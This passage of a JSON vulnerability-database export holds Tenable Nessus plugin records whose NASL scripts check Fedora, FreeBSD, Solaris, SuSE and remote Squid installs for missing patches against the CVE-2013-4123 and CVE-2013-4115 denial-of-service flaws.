value:\"p-cpe:/a:fedoraproject:fedora:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"squid-3.2.13-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T07:07:06", "bulletinFamily": "scanner", "description": "This is security update that fixes CVE-2013-4123 and CVE-2013-4115.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "FEDORA_2013-13493.NASL", "href": "https://www.tenable.com/plugins/nessus/69204", "published": "2013-08-05T00:00:00", "title": "Fedora 18 : squid-3.2.13-1.fc18 (2013-13493)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-13493.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69204);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/28 22:47:45\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n script_bugtraq_id(61111, 61159);\n script_xref(name:\"FEDORA\", value:\"2013-13493\");\n\n script_name(english:\"Fedora 18 : squid-3.2.13-1.fc18 (2013-13493)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is security update that fixes CVE-2013-4123 and CVE-2013-4115.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=983653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=984632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113071.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?85a1ac71\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected squid package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"squid-3.2.13-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T01:44:16", "bulletinFamily": "scanner", "description": "According to its banner, the version of Squid running on the remote\nhost is 3.2.x prior to 3.2.13 or 3.3.x prior to 3.3.8. It is,\ntherefore, affected by a denial of service vulnerability. The\nvulnerability exists when handling a port number in the host header of a\nspecially crafted HTTP Request. \n\nNote that Nessus has relied only on the version in the proxy server", "modified": "2020-01-02T00:00:00", "id": "SQUID_3_2_13.NASL", "href": "https://www.tenable.com/plugins/nessus/69042", "published": "2013-07-24T00:00:00", "title": "Squid 3.2.x < 3.2.13 / 3.3.x < 3.3.8 Port Handling DoS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69042);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2013-4123\");\n script_bugtraq_id(61159, 61182);\n script_xref(name:\"EDB-ID\", value:\"26886\");\n\n script_name(english:\"Squid 3.2.x < 3.2.13 / 3.3.x < 3.3.8 Port Handling DoS\");\n script_summary(english:\"Checks version of Squid\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote proxy server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Squid running on the remote\nhost is 3.2.x prior to 3.2.13 or 3.3.x prior to 3.3.8. It is,\ntherefore, affected by a denial of service vulnerability. The\nvulnerability exists when handling a port number in the host header of a\nspecially crafted HTTP Request. \n\nNote that Nessus has relied only on the version in the proxy server's\nbanner, which is not updated by the patch that the project has released\nto address this issue. If this patch has been applied properly and the\nservice has been restarted, consider this to be a false positive.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.squid-cache.org/Advisories/SQUID-2013_3.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Jul/98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to Squid version 3.2.13 / 3.3.8 or later, or apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:squid-cache:squid\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"squid_version.nasl\");\n script_require_keys(\"www/squid\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/http_proxy\", 3128, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Build a list of ports from the\nlist = get_kb_list(\"http_proxy/*/squid/version\");\nif (isnull(list)) audit(AUDIT_NOT_INST, \"Squid\");\n\n# nb: banner checks of open source software are prone to false-\n# positives so only run the check if reporting is paranoid.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvulnerable = FALSE;\nnot_vuln_list = make_list();\n\nforeach item (keys(list))\n{\n port = ereg_replace(pattern:'^http_proxy/([0-9]+)/squid/version', replace:'\\\\1', string:item);\n version = list[item];\n # Affected:\n\n # Squid 3.2.x < 3.2.13\n # Squid 3.3.x < 3.3.8\n if (\n version =~ \"^3\\.2\\.([0-9]|1[0-2])([^0-9]|$)\" ||\n version =~ \"^3\\.3\\.[0-7]([^0-9]|$)\"\n )\n {\n vulnerable = TRUE;\n if (report_verbosity > 0)\n {\n source = get_kb_item('http_proxy/'+port+'/squid/source');\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 3.2.13 / 3.3.8' + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port:port);\n }\n else not_vuln_list = make_list(not_vuln_list, version + \" on port \" + port);\n}\n\nif (vulnerable) exit(0);\nelse\n{\n installs = max_index(not_vuln_list);\n if (installs == 0) audit(AUDIT_NOT_INST, \"Squid\");\n else if (installs == 1)\n audit(AUDIT_INST_VER_NOT_VULN, \"Squid\", not_vuln_list[0]);\n else\n exit(0, \"The Squid installs (\"+ join(not_vuln_list, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-01T07:40:13", "bulletinFamily": "scanner", "description": "Squid project reports :\n\nDue to incorrect data validation Squid is vulnerable to a denial of\nservice attack when processing specially crafted HTTP requests\n\nThis problem allows any client who can generate HTTP requests to\nperform a denial of service attack on the Squid service.", "modified": "2020-01-02T00:00:00", "id": "FREEBSD_PKG_30A04AB4ED7B11E286438C705AF55518.NASL", "href": "https://www.tenable.com/plugins/nessus/68898", "published": "2013-07-16T00:00:00", "title": "FreeBSD : squid -- denial of service (30a04ab4-ed7b-11e2-8643-8c705af55518)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68898);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:43\");\n\n script_cve_id(\"CVE-2013-4123\");\n\n script_name(english:\"FreeBSD : squid -- denial of service (30a04ab4-ed7b-11e2-8643-8c705af55518)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Squid project reports :\n\nDue to incorrect data validation Squid is vulnerable to a denial of\nservice attack when processing specially crafted HTTP requests\n\nThis problem allows any client who can generate HTTP requests to\nperform a denial of service attack on the Squid service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.squid-cache.org/Advisories/SQUID-2013_3.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/30a04ab4-ed7b-11e2-8643-8c705af55518.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d4846144\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"squid>=3.2<3.2.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"squid>=3.3<3.3.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-01T01:44:05", "bulletinFamily": "scanner", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - client_side_request.cc in Squid 3.2.x before 3.2.13 and\n 3.3.x before 3.3.8 allows remote attackers to cause a\n denial of service via a crafted port number in a HTTP\n Host header. (CVE-2013-4123)", "modified": "2020-01-02T00:00:00", "id": "SOLARIS11_SQUID_20140114.NASL", "href": "https://www.tenable.com/plugins/nessus/80774", "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : squid (cve_2013_4123_input_validation)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80774);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2013-4123\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : squid (cve_2013_4123_input_validation)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - client_side_request.cc in Squid 3.2.x before 3.2.13 and\n 3.3.x before 3.3.8 allows remote attackers to cause a\n denial of service via a crafted port number in a HTTP\n Host header. (CVE-2013-4123)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2013-4123-input-validation-vulnerability-in-squid\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3eb4102e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.15.4.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:squid\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^squid$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.15.0.4.0\", sru:\"SRU 11.1.15.4.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : squid\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"squid\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-01T01:44:16", "bulletinFamily": "scanner", "description": "According to its banner, the version of Squid running on the remote\nhost is 3.x prior to 3.2.12 or 3.3.x prior to 3.3.7 and is, therefore,\naffected by a denial of service vulnerability. A buffer overflow exists\nin the ", "modified": "2020-01-02T00:00:00", "id": "SQUID_3_2_12.NASL", "href": "https://www.tenable.com/plugins/nessus/69041", "published": "2013-07-24T00:00:00", "title": "Squid 3.x < 3.2.12 / 3.3.x < 3.3.7 idnsALookup HTTP Request DoS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69041);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-4115\");\n script_bugtraq_id(61111);\n\n script_name(english:\"Squid 3.x < 3.2.12 / 3.3.x < 3.3.7 idnsALookup HTTP Request DoS\");\n script_summary(english:\"Checks version of Squid\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote proxy server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Squid running on the remote\nhost is 3.x prior to 3.2.12 or 3.3.x prior to 3.3.7 and is, therefore,\naffected by a denial of service vulnerability. A buffer overflow exists\nin the 'idnsALookup' function in the file 'dns_internal.cc' that could\nallow specially crafted HTTP requests that could result in a denial of\nservice.\n\nNote that Nessus has relied only on the version in the proxy server's\nbanner, which is not updated by the patch that the project has released\nto address this issue. If this patch has been applied properly and the\nservice has been restarted, consider this to be a false positive.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.squid-cache.org/Advisories/SQUID-2013_2.txt\");\n # http://www.squid-cache.org/Versions/v3/3.0/changesets/squid-3.0-9200.patch\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d4a3221\");\n # http://www.squid-cache.org/Versions/v3/3.1/changesets/squid-3.1-10487.patch\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01ebdd34\");\n # http://www.squid-cache.org/Versions/v3/3.2/changesets/squid-3.2-11823.patch\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?04f9aba0\");\n # http://www.squid-cache.org/Versions/v3/3.3/changesets/squid-3.3-12587.patch\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89d9d13f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to Squid version 3.2.12 / 3.3.7 or later, or apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4115\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:squid-cache:squid\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"squid_version.nasl\");\n script_require_keys(\"www/squid\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/http_proxy\", 3128, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Build a list of ports from the\nlist = get_kb_list(\"http_proxy/*/squid/version\");\nif (isnull(list)) audit(AUDIT_NOT_INST, \"Squid\");\n\n# nb: banner checks of open source software are prone to false-\n# positives so only run the check if reporting is paranoid.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvulnerable = FALSE;\nnot_vuln_list = make_list();\n\nforeach item (keys(list))\n{\n port = ereg_replace(pattern:'^http_proxy/([0-9]+)/squid/version', replace:'\\\\1', string:item);\n version = list[item];\n # Affected:\n\n # Squid 3.x < 3.2.12\n # Squid 3.3.x < 3.3.7\n if (\n version =~ \"^3\\.[0-1]([^0-9]|$)\" ||\n version =~ \"^3\\.2\\.([0-9]|1[0-1])([^0-9]|$)\" ||\n version =~ \"^3\\.3\\.[0-6]([^0-9]|$)\"\n )\n {\n vulnerable = TRUE;\n if (report_verbosity > 0)\n {\n source = get_kb_item('http_proxy/'+port+'/squid/source');\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 3.2.12 / 3.3.7' + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port:port);\n }\n else not_vuln_list = make_list(not_vuln_list, version + \" on port \" + port);\n}\n\nif (vulnerable) exit(0);\nelse\n{\n installs = max_index(not_vuln_list);\n if (installs == 0) audit(AUDIT_NOT_INST, \"Squid\");\n else if (installs == 1)\n audit(AUDIT_INST_VER_NOT_VULN, \"Squid\", not_vuln_list[0]);\n else\n exit(0, \"The Squid installs (\"+ join(not_vuln_list, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T01:45:43", "bulletinFamily": "scanner", "description": "This squid update fixes a buffer overflow issue when squid attempts to\nresolve an overly long hostname. This can be triggered with specially\ncrafted http requests. (bnc#829084, CVE-2013-4115)\n\nThis update also includes a correction to the last change for\nlogrotate. (bnc#677335)", "modified": "2020-01-02T00:00:00", "id": "SUSE_11_SQUID-130909.NASL", "href": "https://www.tenable.com/plugins/nessus/70021", "published": "2013-09-20T00:00:00", "title": "SuSE 11.2 / 11.3 Security Update : squid (SAT Patch Numbers 8309 / 8310)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70021);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:56:04 $\");\n\n script_cve_id(\"CVE-2013-4115\");\n\n script_name(english:\"SuSE 11.2 / 11.3 Security Update : squid (SAT Patch Numbers 8309 / 8310)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid update fixes a buffer overflow issue when squid attempts to\nresolve an overly long hostname. This can be triggered with specially\ncrafted http requests. (bnc#829084, CVE-2013-4115)\n\nThis update also includes a correction to the last change for\nlogrotate. (bnc#677335)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4115.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 8309 / 8310 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/20\");\n 